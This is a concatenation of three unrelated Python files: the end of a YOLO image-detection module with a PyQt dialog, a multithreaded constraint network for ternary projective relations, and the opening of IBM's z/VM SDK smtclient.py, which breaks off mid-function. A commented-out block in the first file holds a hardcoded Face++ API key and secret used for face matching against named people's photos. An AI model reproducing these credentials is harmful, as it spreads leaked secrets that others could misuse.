print('{} model, anchors, and classes loaded.'.format(model_path))
# Generate colors for drawing bounding boxes.
hsv_tuples = [(x / len(self.class_names), 1., 1.)
for x in range(len(self.class_names))]
self.colors = list(map(lambda x: colorsys.hsv_to_rgb(*x), hsv_tuples))
self.colors = list(
map(lambda x: (int(x[0] * 255), int(x[1] * 255), int(x[2] * 255)),
self.colors))
np.random.seed(10101) # Fixed seed for consistent colors across runs.
np.random.shuffle(self.colors) # Shuffle colors to decorrelate adjacent classes.
np.random.seed(None) # Reset seed to default.
# Generate output tensor targets for filtered bounding boxes.
self.input_image_shape = K.placeholder(shape=(2, ))
if self.gpu_num>=2:
self.yolo_model = multi_gpu_model(self.yolo_model, gpus=self.gpu_num)
boxes, scores, classes = yolo_eval(self.yolo_model.output, self.anchors,
len(self.class_names), self.input_image_shape,
score_threshold=self.score, iou_threshold=self.iou)
return boxes, scores, classes
def detect_image(self, image):
start = timer()
if self.model_image_size != (None, None):
assert self.model_image_size[0]%32 == 0, 'Multiples of 32 required'
assert self.model_image_size[1]%32 == 0, 'Multiples of 32 required'
boxed_image = letterbox_image(image, tuple(reversed(self.model_image_size)))
else:
new_image_size = (image.width - (image.width % 32),
image.height - (image.height % 32))
boxed_image = letterbox_image(image, new_image_size)
image_data = np.array(boxed_image, dtype='float32')
print(image_data.shape)
image_data /= 255.
image_data = np.expand_dims(image_data, 0) # Add batch dimension.
out_boxes, out_scores, out_classes = self.sess.run(
[self.boxes, self.scores, self.classes],
feed_dict={
self.yolo_model.input: image_data,
self.input_image_shape: [image.size[1], image.size[0]],
K.learning_phase(): 0
})
print('Found {} boxes for {}'.format(len(out_boxes), 'img'))
font = ImageFont.truetype(font='font/FiraMono-Medium.otf',
size=np.floor(3e-2 * image.size[1] + 0.5).astype('int32'))
thickness = (image.size[0] + image.size[1]) // 300
for i, c in reversed(list(enumerate(out_classes))):
predicted_class = self.class_names[c]
box = out_boxes[i]
score = out_scores[i]
label = '{} {:.2f}'.format(predicted_class, score)
self.label = predicted_class
draw = ImageDraw.Draw(image)
label_size = draw.textsize(label, font)
top, left, bottom, right = box
top = max(0, np.floor(top + 0.5).astype('int32'))
left = max(0, np.floor(left + 0.5).astype('int32'))
bottom = min(image.size[1], np.floor(bottom + 0.5).astype('int32'))
right = min(image.size[0], np.floor(right + 0.5).astype('int32'))
print(label, (left, top), (right, bottom)) # 最后的标签和坐标
if top - label_size[1] >= 0:
text_origin = np.array([left, top - label_size[1]])
else:
text_origin = np.array([left, top + 1])
# My kingdom for a good redistributable image drawing library.
for i in range(thickness):
draw.rectangle(
[left + i, top + i, right - i, bottom - i],
outline=self.colors[c])
draw.rectangle(
[tuple(text_origin), tuple(text_origin + label_size)],
fill=self.colors[c])
draw.text(text_origin, label, fill=(0, 0, 0), font=font)
del draw
end = timer()
print('time:', end - start)
return image
def close_session(self):
self.sess.close()
############################################################
# def compareIm(faceId1, faceId2):
# # 传送两个本地图片地址 例如:"D:/Downloads/wt.jpg"
# try:
# # 官方给你的接口地址
# compare_url = "https://api-cn.faceplusplus.com/facepp/v3/compare"
# # 创建应用分配的key和secret
# key = "MGS1NV6UEoPTxvoSTJYv8zsKv6an3cPl"
# secret = "qAddmxSmzW_9rm8dCDsp0bVmAtrAV0Y8"
# # 创建请求数据
# data = {"api_key": key, "api_secret": secret}
# files = {"image_file1": open(faceId1, "rb"), "image_file2": open(faceId2, "rb")}
# # 通过接口发送请求
# response = requests.post(compare_url, data=data, files=files)
#
# req_con = response.content.decode('utf-8')
# req_dict = JSONDecoder().decode(req_con)
# # print(req_dict)
# # 获得json文件里的confidence值,也就是相似度
# confindence = req_dict['confidence']
# if confindence > 75:
# print("图片相似度:", confindence)
# # confindence为相似度
# return confindence
# except Exception:
# pass
# # print("无法识别!")
#
#
# # 无限调用face++识别接口,并根据返回相似度判断人脸
# def sbdg(i):
# for k in range(1):
# try:
# if compareIm(imgdict[i],"D:/qt5design/wt.jpg") > 75:
# print("身份确认是:", i)
# global result
# result=str(i)
# except Exception:
# pass
#
# #
# #
# imgdict = {"路程": "D:/python文件夹/pycharm_project/untitled2/untitled2/face_data/LuCheng.jpg","刘翔": "D:/python文件夹/pycharm_project/untitled2/untitled2/face_data/LuCheng.jpg","王自如": "D:/python文件夹/pycharm_project/untitled2/untitled2/face_data/LuCheng.jpg"}
# #
# # # 开启摄像头
# # cap = cv2.VideoCapture(0)
# # # 开启捕捉摄像头进程
# # threading.Thread(target=getimg).start()
# # # 每个匹配对象创建一个线程,为了降低等待延迟
# def RUN():
# for x in imgdict:
# threading.Thread(target=sbdg, args=(x,)).start()
if __name__ == "__main__":
app = QApplication(sys.argv)
myDialog = Dialog()
myDialog.show()
sys.exit(app.exec_())
|
MultithreadedTernaryProjectiveRelations.py
|
import itertools
from collections import defaultdict
from Model.Relations import *
from Model.Relations import _Operations
import time
import threading
'''
def Constraints(re1, re2):
comp = set()
for r1 in re1:
for r2 in re2:
comp = comp.union(_Operations.composition(r1,r2))
return comp
def conv(R):
convR = set()
for r in R:
convR.add(r.converse())
return convR
def rot(R):
rotR = set()
for r in R:
rotR.add(r.rotate())
return rotR
'''
lock = threading.Lock()
class ConstraintNetwork:
def __init__(self, triplets={}):
self.triplets = triplets
self.visited = {}
for key in self.triplets.keys():
self.visited[key]=False
def setrel(self, R1, R2, R3, rel):
#if the triplet is already in the dictionary in any of its permutations,
#it removes the entry and stores the new relation
permutations = tuple(itertools.permutations((R1,R2,R3)))
for triplet in permutations:
if triplet in self.triplets.keys():
del self.triplets[triplet]
del self.visited[triplet]
self.triplets[R1, R2, R3] = rel
self.visited[R1, R2, R3] = False
def setvisitedfalse(self):
for key in self.triplets.keys():
self.visited[key]=False
def OperatorTable(self,i):
array_op=[lambda x: x, lambda x: ProjectiveRelation.converse(x), \
lambda x: ProjectiveRelation.rotate(ProjectiveRelation.converse(x)), \
lambda x: ProjectiveRelation.rotate(x), \
lambda x: ProjectiveRelation.converse(ProjectiveRelation.rotate(ProjectiveRelation.converse(x))), \
lambda x: ProjectiveRelation.converse(ProjectiveRelation.rotate(x))]
return array_op[i]
def getrel(self, R1, R2, R3):
permutations = tuple(itertools.permutations((R1, R2, R3)))
for i in range(len(permutations)):
triplet=permutations[i]
if triplet in self.triplets.keys():
r=self.triplets[triplet] #it finds the relation stored in the dictionary
OP=self.OperatorTable(i)
r1=OP(r) #based on the permutation, we need to apply the necessary operators to find the relation that holds for R1,R2,R3
return r1
return U #dd U dc , in this case there are no stored permutations
def nodes(self):
keys = self.triplets.keys()
nodes = set()
for (a, b, c) in keys:
nodes.add(a)
nodes.add(b)
nodes.add(c)
return nodes
def adjtrip(self, R1, R2, R3):
'''
It finds triplets of regions in the current network having two regions in common with triplet (R1,R2,R3)
It only works with tuples in the given order, that is, it doesn't check for permutations
It returns a set of tuples
'''
#print("calculating adjacent triplets to ", (R1,R2,R3))
keys = [key for key in self.triplets.keys() if self.visited[key]==False]
#print("the candidate keys for which visited==False are: ")
#print(keys)
adjtrip = set()
subset1 = set()
subset2 = set()
subset3 = set()
set1 = set()
set1.add((R1, R2, R3))
subset1.update([R1, R2])
subset2.update([R1, R3])
subset3.update([R2, R3])
for (a, b, c) in keys:
set0=set()
set0.update([a, b, c])
if subset1.issubset(set0) or subset2.issubset(set0) or subset3.issubset(set0):
adjtrip.add((a, b, c))
adjtrip = adjtrip - set1 #this set difference removes the triplet (R1,R2,R3) from the result
return adjtrip
def regions_in_common(self,regions, triplet):
# the two given triplets must have two elements in common
# the function returns a tuple (RA,RB,RC,RD) where RD is the region not in common in (R1,R2,R3),
# RB and RC are the regions in common,
# and RA is the region not in common in <triplet>
(RA, RB, RC, RD) = (None, None, None, None)
(R1, R2, R3)=regions
abcset=set()
abcset.update(triplet)
if R1 not in triplet:
(RB, RC, RD)=(R2, R3, R1)
abcset.remove(R2)
abcset.remove(R3)
if R2 not in triplet:
(RB, RC, RD) = (R3, R1, R2)
abcset.remove(R1)
abcset.remove(R3)
if R3 not in triplet:
(RB, RC, RD) = (R1, R2, R3)
abcset.remove(R1)
abcset.remove(R2)
RA = abcset.pop()
return (RA, RB, RC, RD)
def calculate(self,triplet,R1,R2,R3,queue,C):
#(R1,R2,R3) is the triplet extracted from the queue
# <triplet> is one of the adjacent triplets to (R1,R2,R3)
C.visited[triplet] = True
# we need to find the regions that are in common with function regions_in_common:
# where RD is the region not in common in (R1,R2,R3), RB and RC are the regions in common,
# and RA is the region not in common in <triplet>
(RA,RB,RC,RD)=self.regions_in_common((R1,R2,R3),triplet)
# the two new triplets to be added to the network are (RA,RC,RD) and (RA,RB,RD)
t1=(RA, RC, RD)
t2=(RA, RB, RD)
# getrel must take into account permutations
# compositions to be calculated are RA,RB,RC + RB,RC,RD = RA,RC,RD
# and RA,RC,RB + RC,RB,RD = RA,RB,RD
r1=C.getrel(RA, RB, RC)
r2=C.getrel(RB, RC, RD)
newr1 = r1.composition(r2)
r3=C.getrel(RA, RC, RB)
r4=C.getrel(RC, RB, RD)
newr2 = r3.composition(r4)
#print(r3)
#print(r4)
oldr1 = C.getrel(RA, RC, RD)
oldr2 = C.getrel(RA, RB, RD)
inters1 = oldr1.intersection(newr1)
inters2 = oldr2.intersection(newr2)
with lock:
if inters1 != oldr1:
C.setrel(RA, RC, RD, inters1)
C.visited[RA, RC, RD] = True
queue.append(t1)
if inters2 != oldr2:
C.setrel(RA, RB, RD, inters2)
C.visited[RA, RB, RD] = True
queue.append(t2)
# print("processing adjacent triplet ", triplet, " to ", (R1,R2,R3))
# print("two new relations are added")
# print("now constraint network is :")
# print(C)
def addrel(self, R1, R2, R3, rel):
C = self
queue = []
queue.append((R1, R2, R3))
#print("appended relation to queue...")
#print("queue contains now ", queue)
r = C.getrel(R1, R2, R3)
#print("retrieved relation ",r)
inters=r.intersection(rel)
#print("made intersection, result is ", inters)
C.setrel(R1, R2, R3, inters)
C.visited[R1, R2, R3] = True
# print("set relation")
# print("now constraint network is :")
# print(C)
while queue != []:
# adjtrip finds triplets with two regions in common with (R1,R2,R3)
(R1, R2, R3) = queue.pop(0)
#print("now extracted from queue relation ", (R1,R2,R3))
adjtrip = C.adjtrip(R1, R2, R3)
#print("now finding adjacent triplets. They are:")
#print(adjtrip)
threads= []
for triplet in adjtrip:
t = threading.Thread(target=self.calculate,args=(triplet,R1,R2,R3,queue,C,))
threads.append(t)
t.start()
for thread in threads:
thread.join()
#when queue is empty the network is set back all to visited = False
C.setvisitedfalse()
def __str__(self):
s = ''
for arc in self.triplets:
s = s + str(arc) + ': ' + str(C.triplets[arc]) + '\n'
return s
if __name__ == '__main__':
print("Starting timer...")
start = time.time()
C = ConstraintNetwork()
print("start. Adding first relation to C...")
C.addrel('A', 'B', 'C','bf')
print("done. Now adding second relation to C...")
C.addrel('B', 'C', 'D','rs')
print("done! Now adding third relation to C...")
C.addrel('C', 'D', 'E', 'ls')
end = time.time()
print("done! Now trying to print out C")
print(C)
print("ELAPSED TIME: ", end - start)
# further work: find a topological interpretation with intervals
'''
C.setrel('s','l',{'o','m'})
C.setrel('s','r',{'<','m','mi','>'})
R=Constraints(C.getrel('l','s'),C.getrel('s','r'))
C.setrel('l','r',R)
newarc={'o','s','d'}
inters=C.getrel('l','r').intersection(newarc)
C.setrel('l','r',inters)
newarc=Constraints(C.getrel('s','l'),C.getrel('l','r'))
inters=C.getrel('s','r').intersection(newarc)
C.setrel('s','r',inters)
#print(C)
'''
|
smtclient.py
|
# Copyright 2017,2021 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import functools
import hashlib
import math
# On SLES12, we found that if you import urllib.parse later
# than requests, you will find a error like 'not able to load
# urllib.parse, this is because urllib will be in sys.modules
# when first import requests
# as workaround here, we first import urllib then import requests
# later, we need consider to use urllib.request to replace
# requests if that's possible to avoid this kind of issue
from io import IOBase
import shutil
import six.moves.urllib.parse as urlparse
import requests
import threading
import os
import re
import six
import string
import subprocess
import tempfile
import time
from smtLayer import smt
from zvmsdk import config
from zvmsdk import constants as const
from zvmsdk import database
from zvmsdk import exception
from zvmsdk import log
from zvmsdk import returncode
from zvmsdk import utils as zvmutils
CONF = config.CONF
LOG = log.LOG
_LOCK = threading.Lock()
CHUNKSIZE = 4096
_SMT_CLIENT = None
def get_smtclient():
global _SMT_CLIENT
if _SMT_CLIENT is None:
try:
_SMT_CLIENT = zvmutils.import_object(
'zvmsdk.smtclient.SMTClient')
except ImportError:
LOG.error("Unable to get smtclient")
raise ImportError
return _SMT_CLIENT
class SMTClient(object):
def __init__(self):
self._smt = smt.SMT()
self._pathutils = zvmutils.PathUtils()
self._NetDbOperator = database.NetworkDbOperator()
self._GuestDbOperator = database.GuestDbOperator()
self._ImageDbOperator = database.ImageDbOperator()
def _request(self, requestData):
try:
results = self._smt.request(requestData)
except Exception as err:
LOG.error('SMT internal parse encounter error')
raise exception.SDKInternalError(msg=err, modID='smt')
def _is_smt_internal_error(results):
internal_error_list = returncode.SMT_INTERNAL_ERROR
for error in internal_error_list:
if results['overallRC'] != error[0]:
# overallRC does not match, continue next
continue
if error[1] is not None and results['rc'] != error[1]:
# rc match failed
continue
if error[2] is not None and results['rs'] not in error[2]:
# rs match failed
continue
# All match finish successfully, return true
return True
return False
if results['overallRC'] != 0:
results.pop('logEntries')
# Check whether this smt error belongs to internal error, if so,
# raise internal error, otherwise raise clientrequestfailed error
if _is_smt_internal_error(results):
msg = "SMT internal error. Results: %s" % str(results)
LOG.error(msg)
raise exception.SDKInternalError(msg=msg,
modID='smt',
results=results)
else:
msg = ("SMT request failed. RequestData: '%s', Results: '%s'"
% (requestData, str(results)))
raise exception.SDKSMTRequestFailed(results, msg)
return results
def get_guest_temp_path(self, userid):
return self._pathutils.get_guest_temp_path(userid)
def get_guest_path(self, userid):
return self._pathutils.get_guest_path(userid)
def clean_temp_folder(self, tmp_folder):
return self._pathutils.clean_temp_folder(tmp_folder)
def _generate_vdev(self, base, offset):
"""Generate virtual device number based on base vdev
:param base: base virtual device number, string of 4 bit hex.
:param offset: offset to base, integer.
"""
vdev = hex(int(base, 16) + offset)[2:]
return vdev.rjust(4, '0')
def _generate_increasing_nic_id(self, nic_id):
"""Generate increasing nic id string
:param nic_id: hexadecimal nic id like '1000'
:return: increasing nic id, string like '0.0.1000,0.0.1001,0.0.1002'
"""
nic_id = str(hex(int(nic_id, 16)))[2:]
nic_id_1 = str(hex(int(nic_id, 16) + 1))[2:]
nic_id_2 = str(hex(int(nic_id, 16) + 2))[2:]
if len(nic_id_2) > 4:
errmsg = ("Virtual device number %s is not valid" % nic_id_2)
raise exception.SDKInvalidInputFormat(msg=errmsg)
return "0.0.%s,0.0.%s,0.0.%s" % (nic_id, nic_id_1, nic_id_2)
def generate_disk_vdev(self, start_vdev=None, offset=0):
"""Generate virtual device number for disks
:param offset: offset of user_root_vdev.
:return: virtual device number, string of 4 bit hex.
"""
if not start_vdev:
start_vdev = CONF.zvm.user_root_vdev
vdev = self._generate_vdev(start_vdev, offset)
if offset >= 0 and offset < 254:
return vdev
else:
msg = ("Failed to generate disk vdev, invalid virtual device"
"number for disk:%s" % vdev)
LOG.error(msg)
raise exception.SDKGuestOperationError(rs=2, msg=msg)
def add_mdisks(self, userid, disk_list, start_vdev=None):
"""Add disks for the userid
:disks: A list dictionary to describe disk info, for example:
disk: [{'size': '1g',
'format': 'ext3',
'disk_pool': 'ECKD:eckdpool1'},
{'size': '1g',
'format': 'ext3'}]
"""
# Firstly, check disk_pool in disk_list, if disk_pool not specified
# and not configured(the default vaule is None), report error
# report error
for idx, disk in enumerate(disk_list):
disk_pool = disk.get('disk_pool') or CONF.zvm.disk_pool
disk['disk_pool'] = disk_pool
if disk_pool is None:
msg = ('disk_pool not configured for sdkserver.')
LOG.error(msg)
raise exception.SDKGuestOperationError(rs=2, msg=msg)
for idx, disk in enumerate(disk_list):
if 'vdev' in disk:
# this means user want to create their own device number
vdev = disk['vdev']
else:
vdev = self.generate_disk_vdev(start_vdev=start_vdev,
offset=idx)
self._add_mdisk(userid, disk, vdev)
disk['vdev'] = vdev
sizeUpper = disk.get('size').strip().upper()
sizeUnit = sizeUpper[-1]
if sizeUnit != 'G' and sizeUnit != 'M':
sizeValue = sizeUpper
disk_pool = disk.get('disk_pool')
[diskpool_type, diskpool_name] = disk_pool.split(':')
if (diskpool_type.upper() == 'ECKD'):
# Convert the cylinders to bytes
convert = 737280
else:
# Convert the blocks to bytes
convert = 512
byteSize = float(float(int(sizeValue) * convert / 1024) / 1024)
unit = "M"
if (byteSize > 1024):
byteSize = float(byteSize / 1024)
unit = "G"
byteSize = "%.1f" % byteSize
disk['size'] = byteSize + unit
return disk_list
def remove_mdisks(self, userid, vdev_list):
for vdev in vdev_list:
self._remove_mdisk(userid, vdev)
def dedicate_device(self, userid, vaddr, raddr, mode):
"""dedicate device
:userid: The name of the image obtaining a dedicated device
:vaddr: The virtual device number of the device
:raddr: A real device number to be dedicated or attached
to the specified image
:mode: Specify a 1 if the virtual device is to be in read-only mode.
Otherwise, specify a 0.
"""
# dedicate device to directory entry
self._dedicate_device(userid, vaddr, raddr, mode)
def _dedicate_device(self, userid, vaddr, raddr, mode):
"""dedicate device."""
action = 'dedicate'
rd = ('changevm %(uid)s %(act)s %(va)s %(ra)s %(mod)i' %
{'uid': userid, 'act': action,
'va': vaddr, 'ra': raddr, 'mod': mode})
action = "dedicate device to userid '%s'" % userid
with zvmutils.log_and_reraise_smt_request_failed(action):
self._request(rd)
def get_fcp_info_by_status(self, userid, status=None):
"""get fcp information by the status.
:userid: (str) The name of the image to query fcp info
:status: (str) If status is None, will return the FCP devices
of all statuses. If status specified, will only return the
FCP devices of this status.
The status must be 'active', 'free' or 'offline'.
:returns: (list) a list of string lines that the command output.
"""
action = 'fcpinfo'
if status is None:
# if status is None, will transfer status to all
# to let smtLayer return the FCPs of all the statuses
status = "all"
# always set -k OWNER=YES
rd = ' '.join(['getvm', userid, action, status, "YES"])
action = "query fcp info of '%s'" % userid
with zvmutils.log_and_reraise_smt_request_failed(action):
results = self._request(rd)
return results['response']
def undedicate_device(self, userid, vaddr):
"""undedicate device
:userid: The name of the image obtaining a dedicated device
:vaddr: The virtual device number of the device
"""
# undedicate device to directory entry
self._undedicate_device(userid, vaddr)
def _undedicate_device(self, userid, vaddr):
"""undedicate device."""
action = 'undedicate'
rd = ('changevm %(uid)s %(act)s %(va)s' %
{'uid': userid, 'act': action,
'va': vaddr})
action = "undedicate device from userid '%s'" % userid
with zvmutils.log_and_reraise_smt_request_failed(action):
self._request(rd)
def get_image_performance_info(self, userid):
"""Get CPU and memory usage information.
:userid: the zvm userid to be queried
"""
pi_dict = self.image_performance_query([userid])
return pi_dict.get(userid, None)
def get_adapters_info(self, userid):
rd = ' '.join((
"SMAPI %s API Virtual_Network_Adapter_Query_Extended" % userid,
"--operands",
"-k 'image_device_number=*'"))
results = None
action = "get network info of userid '%s'" % str(userid)
with zvmutils.log_and_reraise_smt_request_failed(action):
results = self._request(rd)
ret = results['response']
# TODO: muti NIC support?
nic_count = 0
for line in ret:
if 'adapter_count=' in line:
nic_count = int(line.strip().split('=')[-1])
break
if nic_count < 1:
msg = 'get_network_info:No NIC found on userid %s' % userid
LOG.error(msg)
raise exception.SDKGuestOperationError(rs=5, userid=userid,
msg=msg)
# save network info into dict by index from 1 to nic_count
# Firstly, get adapter information
adapters_info = []
adapter = dict()
# if found IP, no need to continue
found_mac = False
for line in ret:
if 'adapter_address=' in line:
adapter_addr = line.strip().split('=')[-1]
adapter['adapter_address'] = adapter_addr
if 'adapter_status=' in line:
adapter_type = line.strip().split('=')[-1]
adapter['adapter_status'] = adapter_type
if 'lan_owner=' in line:
lan_owner = line.strip().split('=')[-1]
adapter['lan_owner'] = lan_owner
if 'lan_name=' in line:
lan_name = line.strip().split('=')[-1]
adapter['lan_name'] = lan_name
if 'mac_address=' in line and not found_mac:
mac_addr = line.strip().split('=')[-1]
pattern = re.compile('.{2}')
mac_address = ':'.join(pattern.findall(mac_addr))
adapter['mac_address'] = mac_address
if 'mac_ip_version=' in line:
ip_version = line.strip().split('=')[-1]
adapter['mac_ip_version'] = ip_version
if 'mac_ip_address=' in line:
# once we found mac_ip_address, assume this is the MAC
# we are using, then jump to next adapter
mac_ip = line.strip().split('=')[-1]
adapter['mac_ip_address'] = mac_ip
found_mac = True
if 'adapter_info_end' in line:
adapters_info.append(adapter)
# clear adapter and process next
adapter = dict()
found_mac = False
return adapters_info
def _parse_vswitch_inspect_data(self, rd_list):
""" Parse the Virtual_Network_Vswitch_Query_Byte_Stats data to get
inspect data.
"""
def _parse_value(data_list, idx, keyword, offset):
return idx + offset, data_list[idx].rpartition(keyword)[2].strip()
vsw_dict = {}
with zvmutils.expect_invalid_resp_data():
# vswitch count
idx = 0
idx, vsw_count = _parse_value(rd_list, idx, 'vswitch count:', 2)
vsw_dict['vswitch_count'] = int(vsw_count)
# deal with each vswitch data
vsw_dict['vswitches'] = []
for i in range(vsw_dict['vswitch_count']):
vsw_data = {}
# skip vswitch number
idx += 1
# vswitch name
idx, vsw_name = _parse_value(rd_list, idx, 'vswitch name:', 1)
vsw_data['vswitch_name'] = vsw_name
# uplink count
idx, up_count = _parse_value(rd_list, idx, 'uplink count:', 1)
# skip uplink data
idx += int(up_count) * 9
# skip bridge data
idx += 8
# nic count
vsw_data['nics'] = []
idx, nic_count = _parse_value(rd_list, idx, 'nic count:', 1)
nic_count = int(nic_count)
for j in range(nic_count):
nic_data = {}
idx, nic_id = _parse_value(rd_list, idx, 'nic_id:', 1)
userid, toss, vdev = nic_id.partition(' ')
nic_data['userid'] = userid
nic_data['vdev'] = vdev
idx, nic_data['nic_fr_rx'] = _parse_value(rd_list, idx,
'nic_fr_rx:', 1
)
idx, nic_data['nic_fr_rx_dsc'] = _parse_value(rd_list, idx,
'nic_fr_rx_dsc:', 1
)
idx, nic_data['nic_fr_rx_err'] = _parse_value(rd_list, idx,
'nic_fr_rx_err:', 1
)
idx, nic_data['nic_fr_tx'] = _parse_value(rd_list, idx,
'nic_fr_tx:', 1
)
idx, nic_data['nic_fr_tx_dsc'] = _parse_value(rd_list, idx,
'nic_fr_tx_dsc:', 1
)
idx, nic_data['nic_fr_tx_err'] = _parse_value(rd_list, idx,
'nic_fr_tx_err:', 1
)
idx, nic_data['nic_rx'] = _parse_value(rd_list, idx,
'nic_rx:', 1
)
idx, nic_data['nic_tx'] = _parse_value(rd_list, idx,
'nic_tx:', 1
)
vsw_data['nics'].append(nic_data)
# vlan count
idx, vlan_count = _parse_value(rd_list, idx, 'vlan count:', 1)
# skip vlan data
idx += int(vlan_count) * 3
# skip the blank line
idx += 1
vsw_dict['vswitches'].append(vsw_data)
return vsw_dict
def _is_vdev_valid(self, vdev, vdev_info):
for used_vdev in vdev_info:
if (((int(vdev, 16) >= int(used_vdev, 16)) and
(int(vdev, 16) <= int(used_vdev, 16) + 2)) or
((int(vdev, 16) < int(used_vdev, 16)) and
(int(vdev, 16) >= int(used_vdev, 16) - 2))):
return False
return True
def get_power_state(self, userid):
"""Get power status of a z/VM instance."""
LOG.debug('Querying power stat of %s' % userid)
requestData = "PowerVM " + userid + " status"
action = "query power state of '%s'" % userid
with zvmutils.log_and_reraise_smt_request_failed(action):
results = self._request(requestData)
with zvmutils.expect_invalid_resp_data(results):
status = results['response'][0].partition(': ')[2]
return status
def _check_power_state(self, userid, action):
# Get the vm status
power_state = self.get_power_state(userid)
# Power on the vm if it is inactive
if power_state == 'off':
msg = ('The vm %s is powered off, please start up it '
'before %s' % (userid, action))
raise exception.SDKGuestOperationError(rs=5, userid=userid,
msg=msg)
def guest_start(self, userid):
"""Power on VM."""
requestData = "PowerVM " + userid + " on"
with zvmutils.log_and_reraise_smt_request_failed():
self._request(requestData)
def guest_stop(self, userid, **kwargs):
"""Power off VM."""
requestData = "PowerVM " + userid + " off"
if 'timeout' in kwargs.keys() and kwargs['timeout']:
requestData += ' --maxwait ' + str(kwargs['timeout'])
if 'poll_interval' in kwargs.keys() and kwargs['poll_interval']:
requestData += ' --poll ' + str(kwargs['poll_interval'])
with zvmutils.log_and_reraise_smt_request_failed():
self._request(requestData)
def guest_softstop(self, userid, **kwargs):
"""Power off VM gracefully, it will call shutdown os then
deactivate vm"""
requestData = "PowerVM " + userid + " softoff --wait"
if 'timeout' in kwargs.keys() and kwargs['timeout']:
requestData += ' --maxwait ' + str(kwargs['timeout'])
else:
requestData += ' --maxwait ' + str(CONF.guest.softstop_timeout)
if 'poll_interval' in kwargs.keys() and kwargs['poll_interval']:
requestData += ' --poll ' + str(kwargs['poll_interval'])
else:
requestData += ' --poll ' + str(CONF.guest.softstop_interval)
with zvmutils.log_and_reraise_smt_request_failed():
self._request(requestData)
def guest_pause(self, userid):
self._check_power_state(userid, 'pause')
requestData = "PowerVM " + userid + " pause"
with zvmutils.log_and_reraise_smt_request_failed():
self._request(requestData)
def guest_unpause(self, userid):
self._check_power_state(userid, 'unpause')
requestData = "PowerVM " + userid + " unpause"
with zvmutils.log_and_reraise_smt_request_failed():
self._request(requestData)
def guest_reboot(self, userid):
requestData = ' '.join(("PowerVM", userid, "reboot"))
with zvmutils.log_and_reraise_smt_request_failed():
self._request(requestData)
def guest_reset(self, userid):
requestData = ' '.join(("PowerVM", userid, "reset"))
with zvmutils.log_and_reraise_smt_request_failed():
self._request(requestData)
def live_migrate_move(self, userid, destination, parms):
""" moves the specified virtual machine, while it continues to run,
to the specified system within the SSI cluster. """
rd = ('migratevm %(uid)s move --destination %(dest)s ' %
{'uid': userid, 'dest': destination})
if 'maxtotal' in parms:
rd += ('--maxtotal ' + str(parms['maxtotal']))
if 'maxquiesce' in parms:
rd += (' --maxquiesce ' + str(parms['maxquiesce']))
if 'immediate' in parms:
rd += " --immediate"
if 'forcearch' in parms:
rd += " --forcearch"
if 'forcedomain' in parms:
rd += " --forcedomain"
if 'forcestorage' in parms:
rd += " --forcestorage"
action = "move userid '%s' to SSI '%s'" % (userid, destination)
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err:
msg = ''
if action is not None:
msg = "Failed to %s. " % action
msg += "SMT error: %s" % err.format_message()
LOG.error(msg)
raise exception.SDKSMTRequestFailed(err.results, msg)
def live_migrate_test(self, userid, destination):
""" tests the specified virtual machine and reports whether or not
it is eligible to be relocated to the specified system. """
rd = ('migratevm %(uid)s test --destination %(dest)s ' %
{'uid': userid, 'dest': destination})
action = "test to move userid '%s' to SSI '%s'" % (userid, destination)
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err:
msg = ''
if action is not None:
msg = "Failed to %s. " % action
msg += "SMT error: %s" % err.format_message()
LOG.error(msg)
raise exception.SDKSMTRequestFailed(err.results, msg)
def _get_ipl_param(self, ipl_from):
if len(ipl_from) > 0:
ipl_param = ipl_from
else:
ipl_param = CONF.zvm.user_root_vdev
return ipl_param
def create_vm(self, userid, cpu, memory, disk_list, profile,
max_cpu, max_mem, ipl_from, ipl_param, ipl_loadparam,
dedicate_vdevs, loaddev, account, comment_list,
cschedule='', cshare='', rdomain='', pcif=''):
""" Create VM and add disks if specified. """
rd = ('makevm %(uid)s directory LBYONLY %(mem)im %(pri)s '
'--cpus %(cpu)i --profile %(prof)s --maxCPU %(max_cpu)i '
'--maxMemSize %(max_mem)s --setReservedMem' %
{'uid': userid, 'mem': memory,
'pri': const.ZVM_USER_DEFAULT_PRIVILEGE,
'cpu': cpu, 'prof': profile,
'max_cpu': max_cpu, 'max_mem': max_mem})
if CONF.zvm.default_admin_userid:
ids = CONF.zvm.default_admin_userid.split(' ')
id_str = ':'.join(ids)
rd += (' --logonby %s' % id_str)
# when use dasd as root disk, the disk_list[0] would be the boot
# disk.
# when boot from volume, ipl_from should be specified explicitly.
if (disk_list and 'is_boot_disk' in disk_list[0] and
disk_list[0]['is_boot_disk']) or ipl_from:
# we assume at least one disk exist, which means, is_boot_disk
# is true for exactly one disk.
rd += (' --ipl %s' % self._get_ipl_param(ipl_from))
# load param for ipl
if ipl_param:
rd += ' --iplParam %s' % ipl_param
if ipl_loadparam:
rd += ' --iplLoadparam %s' % ipl_loadparam
if dedicate_vdevs:
rd += ' --dedicate "%s"' % " ".join(dedicate_vdevs)
if account:
rd += ' --account "%s"' % account
if cschedule:
rd += ' --commandSchedule %s' % cschedule
if cshare:
rd += ' --commandSetShare "%s"' % cshare
if rdomain:
rd += ' --commandRDomain %s' % rdomain
if pcif:
v = pcif.split(':')
if len(v) != 2:
errmsg = ("pcif input %s is invalid, must be format like"
" <dev>:<dev>" % pcif)
raise exception.SDKInvalidInputFormat(msg=errmsg)
rd += ' --commandPcif %s' % pcif
comments = ''
if comment_list is not None:
for comment in comment_list:
comments += comment
# This s a dummy spliter and will be used for split
# the comment, for example, input comment is
# comment1,comment2, it will be constructed into
# comment1$@$@$comment2 and send to smtLayer to handle
comments += '$@$@$'
if comments:
rd += ' --comment "%s"' % comments
if loaddev:
if 'portname' in loaddev:
rd += ' --loadportname %s' % loaddev['portname']
if 'lun' in loaddev:
rd += ' --loadlun %s' % loaddev['lun']
# now, we need consider swap only case, customer using boot
# from volume but no disk pool provided, we allow to create
# swap disk from vdisk by default, when we come to this logic
# we are very sure that if no disk pool, there is only one
# disk in disk_list and that's swap
vdisk = None
# this is swap only case, which means, you only create a swap
# disk (len disk_list is 1) and no other disks
if len(disk_list) == 1:
disk = disk_list[0]
if 'format' in disk and disk['format'].lower() == 'swap':
